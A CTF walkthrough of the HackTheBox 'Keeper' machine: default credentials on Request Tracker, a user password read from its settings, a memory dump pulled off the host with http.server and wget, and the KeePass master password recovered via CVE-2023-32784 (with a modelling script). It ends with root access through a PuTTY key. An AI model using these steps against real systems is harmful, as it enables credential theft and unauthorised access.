HackTheBox - Keeper writeup

Published on by logoseq

HackTheBox keeper machine cover image. Made with ❤️ by M3riart3

Walkthrough


Summary:

In this walkthrough, we will explore the Keeper Hack The Box machine. This tutorial will guide us through discovering default credentials for a particular piece of software, in this case Best Practical Request Tracker 4.4.4, and then using CVE-2023-32784 to recover the KeePass master password from a memory dump. We'll also learn how to use these credentials to gain shell access. Furthermore, we'll look at using PuTTY on Windows to connect to the machine as the root user with a PuTTY private key (public-key authentication).

Foothold:

Following my routine, I performed an nmap scan while listening to music on Spotify (I was listening to that song) and observed the following open ports: 22 and 80.

            22/tcp open ssh  OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
            80/tcp open http nginx 1.18.0

During this scan, I discovered the presence of an HTTP server at the address http://10.10.11.227. On the main and only page (gobuster didn't find anything) there was a link to a subdomain named tickets.keeper.htb/rt. To simplify access, I added the entry 10.10.11.227 keeper.htb tickets.keeper.htb to my /etc/hosts file. Subsequently, I navigated to this subdomain and found it hosting Best Practical Request Tracker version 4.4.4.

I didn't have any information about users, so I searched for default credentials on Google and found that version 4.4.4 ships with the combination [REDACTED]. I tried it and it worked!

Image of the Request Tracker web page, where we can see that we are logged in as root and that there are two users present.

Exploitation:

I logged in as root and browsed the pages. Under the Users page I found that two users were present: root and lnorgaard. I opened lnorgaard's settings, and there was his initial password, which was [REDACTED].

Photo of the RT panel where we can see the password of lnorgaard.

I tried ssh lnorgaard@keeper.htb with the password found earlier and it worked: I had shell access to keeper and I was able to read the user's flag.

SSH login as lnorgaard at keeper.htb and flag proof of concept.

...

System Enumeration:

That part was pretty easy. I found a zip file inside the user's home directory named RT3000.zip. I set up a python3 HTTP server on the target and downloaded the file with wget.

            # on the target machine I ran (serves the current directory on port 8888)
            python3 -m http.server 8888
            # while on my machine
            wget http://keeper.htb:8888/RT3000.zip
            # extract the archive locally
            unzip RT3000.zip

Inside that archive I found two files:

            -rwxr-x--- 1 lnorgaard lnorgaard 253395188 May 24 12:51 KeePassDumpFull.dmp
            -rwxr-x--- 1 lnorgaard lnorgaard      3630 May 24 12:51 passcodes.kdbx
After some research I found a possible tool to dump the password from /home/lnorgaard/KeePassDumpFull.dmp, named keepass-dump-masterkey. That tool found a possible password.

The keepass-dump-masterkey tool found a possible password, but it was missing the first character and there were three strange characters.

The first character was missing, as the tool said, and there were three strange characters in the password. I started to search on Google, and after some time I remembered Google dorking: I copied the characters that were present on all the lines and replaced each strange character with *. I searched for: *dgr*d med fl*de and found the password. Keep in mind that there are three non-Latin characters.
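To make sense of why the tool's output looks the way it does (a missing first character, plus garbled positions exactly where the non-Latin letters sit), here is an added educator example, not code from the writeup or from keepass-dump-masterkey. It builds a constructed in-memory buffer that models the remnant pattern behind CVE-2023-32784 (a vulnerable masked text box leaving one bullet-prefixed string per keystroke), then shows what can and cannot be recovered from it. The masking character (U+25CF), the filler bytes and the ASCII-only rendering are assumptions made for the model; the sample password is the one recovered later in this writeup.

```python
"""Constructed model of the CVE-2023-32784 remnant pattern (added educator example).

Nothing here opens a real dump file; the "memory" is built in this script.
"""
import re

BULLET = "\u25cf"                       # assumed masking character of the password box
FILLER = b"\x00" * 16                   # constructed heap noise placed between remnants

# A run of one or more UTF-16LE bullets (cf 25) followed by one UTF-16 code unit.
REMNANT_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def simulate_remnants(password: str) -> list[bytes]:
    """Model the leftover strings a vulnerable masked text box leaves, one per keystroke.

    After the n-th keystroke (n >= 2) a string of (n-1) bullets followed by the typed
    character stays in memory as a .NET (UTF-16LE) string. The first keystroke leaves
    no bullet-prefixed remnant, which is why position 1 can never be recovered.
    """
    return [
        (BULLET * (n - 1) + password[n - 1]).encode("utf-16-le")
        for n in range(2, len(password) + 1)
    ]


def build_fake_memory(password: str) -> bytes:
    """Constructed stand-in for a process dump: remnants separated by filler bytes."""
    return FILLER + FILLER.join(simulate_remnants(password)) + FILLER


def recover_candidate(memory: bytes) -> dict[int, str]:
    """Map each keystroke position (1-based) to the character leaked at that position."""
    found: dict[int, str] = {}
    for match in REMNANT_RE.finditer(memory):
        position = len(match.group(1)) // 2 + 1      # bullets counted -> next position
        found[position] = match.group(2).decode("utf-16-le", errors="replace")
    return found


def render(found: dict[int, str], ascii_only: bool = False) -> str:
    """Lay the leaked characters out as a password candidate.

    Position 1 is always unknown and shown as '?'. With ascii_only=True, characters
    outside printable ASCII are shown as '?' too, modelling a renderer that only
    trusts single-byte output (an assumption about why letters such as 'ø' come out
    as strange characters in tool output; not verified against the real tool).
    """
    if not found:
        return ""
    out = ["?"]
    for pos in range(2, max(found) + 1):
        ch = found.get(pos, "?")
        if ascii_only and not (32 <= ord(ch) < 127):
            ch = "?"
        out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    SAMPLE = "rødgrød med fløde"         # constructed input: the password from this writeup
    leaked = recover_candidate(build_fake_memory(SAMPLE))
    print(render(leaked))                # ?ødgrød med fløde
    print(render(leaked, ascii_only=True))   # ??dgr?d med fl?de
```

Run it and the two rendered lines reproduce the situation described above: the first character is structurally absent from the leak, and an ASCII-only view turns the three ø positions into wildcards, which is exactly where the Google search with * had to do the work. The practical mitigation is simply running a KeePass 2.x release from 2.54 onwards, where the text box no longer leaves these remnants.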

System Exploitation:

I switched to Windows, downloaded KeePass 2.54 portable, opened the software, then opened passcodes.kdbx and used the password found earlier, rødgrød med fløde, and it worked! Under root's notes there was a PuTTY RSA key, which allowed me to connect to the machine as root through PuTTY with public-key authentication. To do so I right-clicked on the root note and selected "Copy note", then created a file named certificate.ppk and pasted the note I had copied. I then right-clicked on the file, selected "Open with PuTTY", entered root@10.10.11.227, and it worked: I had shell access on the machine as root.

Writeup learnings:

This machine [keeper.htb] was an easy one. Despite this, I reviewed my knowledge of Google dorking and Windows PuTTY, and learned about a new piece of software, Request Tracker v4.4.4.